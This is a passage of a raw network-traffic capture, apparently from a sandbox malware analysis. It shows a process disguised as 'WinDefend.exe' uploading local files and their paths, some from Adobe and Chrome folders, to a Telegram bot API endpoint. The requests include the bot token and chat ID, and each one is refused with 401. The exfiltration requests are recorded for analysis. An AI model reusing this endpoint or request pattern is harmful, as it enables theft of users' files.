2024-05-23 13:34:33 UTC	155	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=apple-touch-icon-57x57-precomposed.png; filename*=utf-8''apple-touch-icon-57x57-precomposed.png
2024-05-23 13:34:33 UTC	2759	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 39 00 00 00 39 08 06 00 00 00 8c 18 83 85 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a c3 00 00 0a c3 01 34 29 24 ab 00 00 00 16 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 31 30 2f 33 30 2f 31 32 62 c2 cd 43 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 0a 1f 49 44 41 54 68 81 dd 9a 7b 74 54 d5 15 87 bf 3b 33 c9 24 93 07 21 01 02 a1 e6 01 1a c2 0c 82 82 18 62 44 44 16 10 7c 42 05 b1 2a a2 7d a9 88 45 db a5 56 4b 51 b4 d5 b5 a4 a5 0a 15 95 02 0a 1a 6c bb 56 55 4a 44 1e 6a 30 d0 a8 45 25 44 91 25 08 c1 84 3c 24 ef 21 21 99 c7 bd b7 7f 24 77 7a 73 e7 3e 66 20 b6 4b f6 5a b3 ee Data Ascii: PNGIHDR99sBIT\|dpHYs4)$tEXtCreation Time10/30/12bCtEXtSoftwareAdobe Fireworks CS6IDATh{tT;3$!bDD\|B*}EVKQlVUJDj0E%D%<$!!$wzs>f KZ
2024-05-23 13:34:33 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 37 39 34 32 34 38 61 65 2d 31 32 66 64 2d 34 62 37 62 2d 62 63 35 37 2d 65 37 39 38 39 38 61 65 37 66 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --794248ae-12fd-4b7b-bc57-e79898ae7f2aContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:33 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:33 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 37 39 34 32 34 38 61 65 2d 31 32 66 64 2d 34 62 37 62 2d 62 63 35 37 2d 65 37 39 38 39 38 61 65 37 66 32 61 2d 2d 0d 0a Data Ascii: --794248ae-12fd-4b7b-bc57-e79898ae7f2a--
2024-05-23 13:34:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:33 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	61093	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:33 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="96735425-aaf7-4152-b267-6c98daa776a9" Host: api.telegram.org Content-Length: 6007 Expect: 100-continue
2024-05-23 13:34:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:33 UTC	40	OUT	Data Raw: 2d 2d 39 36 37 33 35 34 32 35 2d 61 61 66 37 2d 34 31 35 32 2d 62 32 36 37 2d 36 63 39 38 64 61 61 37 37 36 61 39 0d 0a Data Ascii: --96735425-aaf7-4152-b267-6c98daa776a9
2024-05-23 13:34:33 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 39 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 39 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=192.png; filename*=utf-8''192.png
2024-05-23 13:34:33 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 16 00 49 44 41 54 78 9c ed 9d 7d 74 15 e5 9d c7 bf bf 79 e6 be df e4 de bc 07 a1 12 04 95 8a 2f 08 89 a5 67 e9 36 59 b5 da a3 ab 48 40 d0 ea 96 ad 56 5b 5f 56 5c 61 c5 15 8f f1 a8 55 b7 f6 94 9e aa 4b 5d 3d a8 4b 09 22 94 7a ce ee 56 25 dd a4 bb 9e 2d 4a 54 7a ea 51 76 4d cf c9 2a 48 28 c1 52 49 34 c9 9d 99 67 ff 48 6c 29 1b b8 73 ef 9d 67 9e 67 e6 3e 9f ff 48 e6 3e cf 17 98 ef 9d 99 df 3c bf ef 03 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 d1 68 34 1a 8d 46 a3 09 1a 24 5b 80 ea 9c 74 ef 17 16 3a 06 fd 19 38 35 73 38 b3 08 94 e5 e0 59 02 65 65 6b 3b 86 41 00 43 1c fc 30 c1 e8 03 39 3b 89 f3 5f Data Ascii: PNGIHDRRlIDATx}ty/g6YH@V[_V\aUK]=K"zV%-JTzQvM*H(RI4gHl)sgg>H><h4Fh4Fh4Fh4Fh4Fh4F$[t:85s8Yeek;AC09;_
2024-05-23 13:34:33 UTC	1593	OUT	Data Raw: 6d 86 a7 e9 e3 b2 d8 e8 e6 fe 1f 28 a0 1f 80 93 fc ed 80 4a 21 19 4f a0 22 99 92 2d 43 79 5e 9e 76 05 f6 25 4f 96 2d a3 14 2c d8 b6 eb 73 d5 b5 01 06 d6 9f 15 d8 8e 22 02 a1 b1 aa 46 b6 8c 40 60 13 c3 73 a7 de 2c 5b 46 f1 10 1e ab ef 79 d3 75 47 5f 41 3d c1 8c b1 40 6e c8 36 51 f6 94 2d 23 30 fc aa e6 3c fc aa ba 45 b6 8c 62 18 8c 58 b9 fb 0a f9 40 41 06 d8 fb c4 9c 3e 10 d6 15 a6 49 2e 86 61 a0 3e ab cb 9e 85 b2 e1 b4 db 02 57 16 25 f0 b5 6e ef fd 3f a3 e0 5c 20 cb 60 0f 22 40 1d 45 f5 d9 6a 18 86 b0 fd c0 43 cb 40 72 2a 7e f6 b9 82 63 76 e4 c1 f1 76 ad 9d 7e ba d0 8f 15 7c 66 1c 7c 62 ce 10 e7 3c 10 1b b2 c5 22 51 64 d3 15 b2 65 04 96 ed 4d d7 e2 48 24 18 65 63 32 f8 ad d4 53 78 47 5f 51 5f 8d 03 4f 9e f3 2c 02 f0 76 b8 a1 aa 06 e4 ed 4e b0 65 c5 b0 99 Data Ascii: m(J!O"-Cy^v%O-,s"F@`s,[FyuG_A=@n6Q-#0<EbX@A>I.a>W%n?\ `"@EjC@r*~cvv~\|f\|b<"QdeMH$ec2SxG_Q_O,vNe
2024-05-23 13:34:33 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 36 37 33 35 34 32 35 2d 61 61 66 37 2d 34 31 35 32 2d 62 32 36 37 2d 36 63 39 38 64 61 61 37 37 36 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --96735425-aaf7-4152-b267-6c98daa776a9Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:33 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:33 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 36 37 33 35 34 32 35 2d 61 61 66 37 2d 34 31 35 32 2d 62 32 36 37 2d 36 63 39 38 64 61 61 37 37 36 61 39 2d 2d 0d 0a Data Ascii: --96735425-aaf7-4152-b267-6c98daa776a9--
2024-05-23 13:34:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:33 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	61094	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:33 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9dfbb0fb-9ca1-41ad-ac6e-08850e17be28" Host: api.telegram.org Content-Length: 82396 Expect: 100-continue
2024-05-23 13:34:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:34 UTC	40	OUT	Data Raw: 2d 2d 39 64 66 62 62 30 66 62 2d 39 63 61 31 2d 34 31 61 64 2d 61 63 36 65 2d 30 38 38 35 30 65 31 37 62 65 32 38 0d 0a Data Ascii: --9dfbb0fb-9ca1-41ad-ac6e-08850e17be28
2024-05-23 13:34:34 UTC	101	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 41 64 6f 62 65 49 44 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 41 64 6f 62 65 49 44 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=AdobeID.pdf; filename*=utf-8''AdobeID.pdf
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 33 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 38 32 30 37 30 2f 4f 20 31 36 2f 45 20 31 31 32 36 37 2f 4e 20 31 2f 54 20 38 31 37 36 33 2f 48 20 5b 20 37 31 36 20 31 38 37 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 31 33 20 32 31 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 30 33 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 38 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 33 33 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 31 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 36 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 Data Ascii: %PDF-1.6%13 0 obj<</Linearized 1/L 82070/O 16/E 11267/N 1/T 81763/H [ 716 187]>>endobj xref13 210000000016 00000 n0000000903 00000 n0000000982 00000 n0000001133 00000 n0000001518 00000 n0000001564 00000 n000000
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 39 36 20 30 20 30 20 30 20 30 20 32 38 35 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 35 32 38 20 30 20 34 35 31 20 35 39 36 20 35 32 38 20 30 20 35 38 35 20 30 20 32 37 34 20 30 20 30 20 32 37 35 20 30 20 35 38 36 20 35 37 37 20 30 20 30 20 30 20 30 20 33 36 37 5d 2f 42 61 73 65 46 6f 6e 74 2f 4b 47 54 45 48 59 2b 4d 79 72 69 61 64 50 72 6f 2d 42 6f 6c 64 2f 46 69 72 73 74 43 68 61 72 20 33 31 2f 45 6e 63 6f 64 69 6e 67 20 33 30 20 30 20 52 2f 54 79 70 65 2f 46 6f 6e 74 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 35 20 30 20 6f 62 6a 0d Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 696 0 0 0 0 285 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 528 0 451 596 528 0 585 0 274 0 0 275 0 586 577 0 0 0 0 367]/BaseFont/KGTEHY+MyriadPro-Bold/FirstChar 31/Encoding 30 0 R/Type/Font>>endobj25 0 obj
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: 3d 87 9f 62 28 20 f2 8a 12 24 33 d7 6d d6 3f f9 54 98 5b ce ae 0a 8f d5 7b b6 8a cb 4f 33 14 15 65 47 6c b0 9b 6f 0e ed 9a ea f9 ec 74 3c 48 ef d9 ff f3 d3 d6 ef fe cf 88 1a 2a 8a 2a a4 30 dc bd 1c 7d cb 68 f4 30 bb 02 bc 7b 3d d1 cf 36 d4 15 75 47 b8 94 e4 3b eb ff ac e2 5d e0 76 36 9e ae d7 fb 7d 6e b1 f0 18 5a 8a 00 a4 51 4c 22 47 af c9 04 2f 63 07 e2 0d f5 d4 fe 39 10 11 47 5c 53 ca e6 53 58 3c 8d 8e da d5 e0 81 7e 38 a2 47 d2 41 3a fc e9 fb df b2 90 f1 0c 3a c4 4e b8 ad 50 3d 87 9f 9b 31 86 a9 64 f3 a1 c4 ee 3c 41 c7 d9 c1 78 01 bf b8 64 dc b5 f9 8f eb df 6f d8 01 74 0e 3b 41 2f e3 57 67 09 66 f3 eb fa 55 ab ca a1 74 22 9e 60 57 e7 37 26 6a fb a1 dc 0d cf 27 e7 a3 53 f1 c6 f5 2b 0e ff 66 01 5f 4e 14 ba a8 1d eb 77 de 64 db 68 0b fa 07 b1 7b d6 96 13 Data Ascii: =b( $3m?T[{O3eGlot<H**0}h0{=6uG;]v6}nZQL"G/c9G\SSX<~8GA::NP=1d<Axdot;A/WgfUt"`W7&j'S+f_Nwdh{
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: 72 63 75 6d 66 6c 65 78 2f 69 64 69 65 72 65 73 69 73 2f 65 74 68 2f 6e 74 69 6c 64 65 2f 6f 67 72 61 76 65 2f 6f 61 63 75 74 65 2f 6f 63 69 72 63 75 6d 66 6c 65 78 2f 6f 74 69 6c 64 65 2f 6f 64 69 65 72 65 73 69 73 2f 64 69 76 69 64 65 2f 6f 73 6c 61 73 68 2f 75 67 72 61 76 65 2f 75 61 63 75 74 65 2f 75 63 69 72 63 75 6d 66 6c 65 78 2f 75 64 69 65 72 65 73 69 73 2f 79 61 63 75 74 65 2f 74 68 6f 72 6e 2f 79 64 69 65 72 65 73 69 73 5d 2f 54 79 70 65 2f 45 6e 63 6f 64 69 6e 67 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 20 30 20 6f 62 6a 0d 3c 3c 2f 53 75 62 74 79 70 65 2f 54 79 70 65 31 2f 4e 61 6d 65 2f 48 65 6c 76 2f 42 61 73 65 46 6f 6e 74 2f 48 65 6c 76 65 74 69 63 61 2f 45 6e 63 6f 64 69 6e 67 20 31 20 30 20 52 2f 54 79 70 65 2f 46 6f 6e 74 3e 3e 0d 65 6e 64 6f Data Ascii: rcumflex/idieresis/eth/ntilde/ograve/oacute/ocircumflex/otilde/odieresis/divide/oslash/ugrave/uacute/ucircumflex/udieresis/yacute/thorn/ydieresis]/Type/Encoding>>endobj2 0 obj<</Subtype/Type1/Name/Helv/BaseFont/Helvetica/Encoding 1 0 R/Type/Font>>endo
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: 4d 20 2b 69 91 16 4b 5a 23 69 31 8f a4 04 d7 21 d0 86 a4 9d ce 94 e1 19 48 99 9a 34 29 84 24 25 99 cc 80 a7 93 74 32 40 a6 4d 03 4d da d2 49 49 ff 00 da 86 b4 29 6d 17 2a 86 e9 ee 3d ba bb 6b 60 3a 03 7b cf 9e 7b be df 39 67 f7 7a ef 15 c7 e4 d2 dc 9a 35 12 92 16 52 e5 22 23 6d e3 4c ae 24 48 af 4d ee 27 ce e6 ca 4c 5f 9e cd 30 a3 1c 6c cd de 70 24 9a 2c 4a 4b 23 9a 67 a4 73 40 21 ca 67 a4 65 38 22 ef f5 9e 44 94 62 52 42 99 a5 52 8c 34 43 a5 b8 62 4a c8 af c9 b1 1b a8 34 5f 66 52 72 e5 71 34 45 23 05 1a 6c 65 8e 06 45 1a 14 3b 51 4c a7 2a d2 89 16 13 84 76 2a 50 e7 ea 32 97 4b b3 d2 5c 72 89 1a db 85 e0 2e 25 aa 0b a4 bb 40 ba 0b 21 5f 57 c3 bb 35 d2 3d a8 85 1e 54 5b 8f d6 2f 89 2d 5d 2d f7 e9 73 7b 7b 51 50 2f 0a ea 55 9c 9a e8 3e 54 40 5f 56 28 64 a4 Data Ascii: M +iKZ#i1!H4)$%t2@MMII)m=k`:{{9gz5R"#mL$HM'L_0lp$,JK#gs@!ge8"DbRBR4CbJ4_fRrq4E#leE;QLv*P2K\r.%@!_W5=T[/-]-s{{QP/U>T@_V(d
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: 05 3b d8 c9 c2 cc ff 33 e7 e0 e0 a3 e4 ee a8 1f 1f d0 a0 d1 6e 51 c5 da 9d b3 af 20 9a 7a 84 a6 34 65 bd e8 21 06 59 61 ba 66 59 2b 39 d5 d1 de 50 46 73 41 b5 c5 05 5f 68 b6 b1 87 4b 3c 1c 77 6e f7 7c fc f1 55 db db 05 9a b3 b4 66 b5 45 31 bd f8 65 36 6a 59 6e b9 8d f4 2c 06 ec 05 f3 19 ac 45 f6 62 2b e3 a6 9b 19 8f 1d 45 fb 07 d8 1b 19 73 05 5f cd e0 3b ad 91 6e 14 7c f9 01 e1 16 8b 13 f3 e3 c8 a0 98 d0 83 6a 9a 83 dd 77 64 63 d5 ba 49 06 c9 dc 2b e3 96 db 93 4b 5a 5e 36 83 25 80 fa d8 f2 f7 a5 96 ca 69 7c b4 7f e4 9f 80 22 80 1b a3 b9 af e1 11 46 6f 24 d3 7c e0 ea e1 75 a3 3e 94 12 da ba 81 dc 3e 96 43 a7 2b 58 09 ac 08 c0 7b f4 99 92 c0 66 1a d2 70 15 24 dd fe e8 e0 43 f9 80 6b e3 70 1d 83 d1 e3 e0 0f 78 7e 62 ae 34 8e 10 ca e5 42 41 f4 8d 5c 11 c5 d9 Data Ascii: ;3nQ z4e!YafY+9PFsA_hK<wn\|UfE1e6jYn,Eb+Es_;n\|jwdcI+KZ^6%i\|"Fo$\|u>>C+X{fp$Ckpx~b4BA\
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: ac 1d 3b 81 9d c7 ae 63 bf 62 4f b1 57 d2 02 e9 1a e9 57 d2 2d d2 3d d2 43 d2 33 d2 4b c1 1e c1 81 c1 a1 c1 2b 82 ad c1 0d b8 37 ee 87 63 78 38 1e 8d 9b f1 4c 7c 11 be 12 df 84 d7 e1 7b f1 a3 f8 59 bc 0f bf 86 8f e1 cf f1 d7 f8 3b 99 93 6c 91 2c 5f b6 46 b6 41 56 2b 6b 92 75 c9 2e c9 ee cb a0 9c 2a 67 cb 31 f9 5c 79 94 dc 28 cf 94 2f 93 af 96 57 c8 ff 25 ef 97 bf 0f d9 1c d2 1f 1a 1e 5a 13 e6 18 b6 22 6c 5b d8 c0 5c 74 ae 66 ae 76 ee ce 70 52 b8 67 b8 38 bc 56 81 28 18 0a 9e 62 8e 42 ab 48 55 e4 2a 8a 14 9b 15 bb 14 93 4a 27 a5 af 52 ab cc 52 6e 55 ee 57 9e 50 f6 2a 47 22 a8 11 01 11 d1 11 29 11 59 11 1b 22 76 44 b4 ab 44 2a a3 6a a9 aa 5a d5 a6 ea 56 5d 51 dd 51 bd 57 33 d4 be ea 10 75 ba fa 1f ea 12 f5 3f d5 6d ea 0e f5 79 f5 88 fa 51 a4 29 b2 34 b2 3e Data Ascii: ;cbOWW-=C3K+7cx8L\|{Y;l,_FAV+ku.g1\y(/W%Z"l[\tfvpRg8V(bBHUJ'RRnUWPG")Y"vDDjZV]QQW3u?myQ)4>
2024-05-23 13:34:34 UTC	4096	OUT	Data Raw: c6 83 4b c3 3d d4 bb f7 1d de ea e2 5e 74 21 42 13 b1 9d 0c ab 6a 89 6f e7 c7 27 ea fe 59 13 75 35 e6 ac c8 76 56 7f 53 5c 75 5b fd 83 43 95 45 99 c6 b6 d8 ed e2 6d 75 5d 5d 69 eb 9d ea d8 d8 2b 1a 66 23 3e 19 5c ed 54 76 f5 43 52 3f 01 a7 a5 6f 38 6f 9f d8 f0 50 71 d3 63 6f cf 47 0e 64 54 e8 51 ed 1e b5 fb 05 af 82 23 9a 0d 0e d7 bd 7b 1e 92 e1 25 f5 71 35 7c 75 c3 d9 d2 32 b1 f7 b3 ba 1b b6 0f c9 fc e2 0b d7 ef aa 6f c6 d6 46 97 68 86 fa bd eb 1d 6c c9 a2 d0 fd e7 3d f9 54 27 ee 49 cd e6 4d 4b 9c 7c 5d f7 3a d6 4e 0c d5 75 0e 8a cc 8c 88 e5 d0 10 86 c4 a3 32 da 57 c0 ad 59 b4 07 13 21 74 0e e6 21 f9 0c b6 c2 3c bd 91 e2 4f 18 f4 91 75 af 64 a4 2c 95 08 02 e2 24 47 4f 1a 6e 81 93 27 9e fe 7c 76 18 bc e7 86 e7 06 2e 83 96 00 4b 38 75 5f d8 36 87 b8 59 34 Data Ascii: K=^t!Bjo'Yu5vVS\u[CEmu]]i+f#>\TvCR?o8oPqcoGdTQ#{%q5\|u2oFhl=T'IMK\|]:Nu2WY!t!<Oud,$GOn'\|v.K8u_6Y4
2024-05-23 13:34:35 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:35 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	61096	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:34 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 233 Expect: 100-continue
2024-05-23 13:34:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:34 UTC	233	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+apple-touch-icon-72x72-precomposed.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Capple-touch-icon-72x72-precomposed.png%0ASize%3A+3+KB
2024-05-23 13:34:34 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:34 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	61097	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:34 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 350 Expect: 100-continue
2024-05-23 13:34:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:34 UTC	350	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 35 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+256.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:34:35 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:35 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	61098	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:35 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="189c1f2a-3378-4c39-b851-08cfff36ab50" Host: api.telegram.org Content-Length: 4105 Expect: 100-continue
2024-05-23 13:34:35 UTC	25	IN	HTTP/1.1 100 Continue
